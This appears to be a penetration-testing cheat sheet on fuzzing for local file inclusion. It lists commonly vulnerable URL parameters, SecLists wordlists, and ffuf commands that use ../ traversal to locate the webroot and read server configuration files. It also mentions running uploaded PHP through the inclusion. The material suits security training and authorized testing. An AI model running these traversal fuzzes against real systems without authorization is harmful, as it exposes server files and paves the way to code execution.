LFI - FUZZING

PRIMARY CATEGORY → LFI

Known Parameters

Reference

HTTP Parameters

?cat={payload}
?dir={payload}
?action={payload}
?board={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?prefix={payload}
?include={payload}
?page={payload}
?inc={payload}
?locate={payload}
?show={payload}
?doc={payload}
?site={payload}
?type={payload}
?view={payload}
?content={payload}
?document={payload}
?layout={payload}
?mod={payload}
?conf={payload}

---

Wordlists

Seclists: Fuzzing/LFI

LFI-Jhaddix.txt

---

Fuzzing Hidden Parameters

See here

---

Fuzzing Server Files

Server Webroot

Linux Wordlist

Windows Wordlist

There are situations where we must locate the Server Webroot to point to the directory where we have uploaded a given file containing PHP code in order to evaluate its content through the LFI

Since we do not know if the webroot path is /var/www/html or /var/www/html/domain.com or another, first we will have to discover the directory in question

/usr/share/seclist/Discovery/Web-Content/default-web-root-directory-windows.txt
/usr/share/seclist/Discovery/Web-Content/default-web-root-directory-linux.txt

FFUF

Ffuf

ffuf -v -t <THREADS> -w <WORDLIST> -u 'http[s]://<TARGET>:<PORT>/index.php?language=../../../../FUZZ/index.php' -fs <INT>

Server Logs | Configurations

If we were not able to identify the server webroot through the previous fuzzing, we should try to read the web server configuration file since there is a directive within it called root ( Nginx ) or DocumentRoot ( Apache ) which points to the web application root

To do so, we may use the LFI-Jhaddix.txt wordlist, as it contains many of the server logs we are looking for

If we want a more precise scan, we can use the following wordlists

Web Server Configuration Files

Linux   •   Windows

FFUF

Ffuf

ffuf -v -t <THREADS> -w <WORDLIST> -u 'http[s]://<TARGET>:<PORT>/index.php?language=../../../../FUZZ' -fs <INT>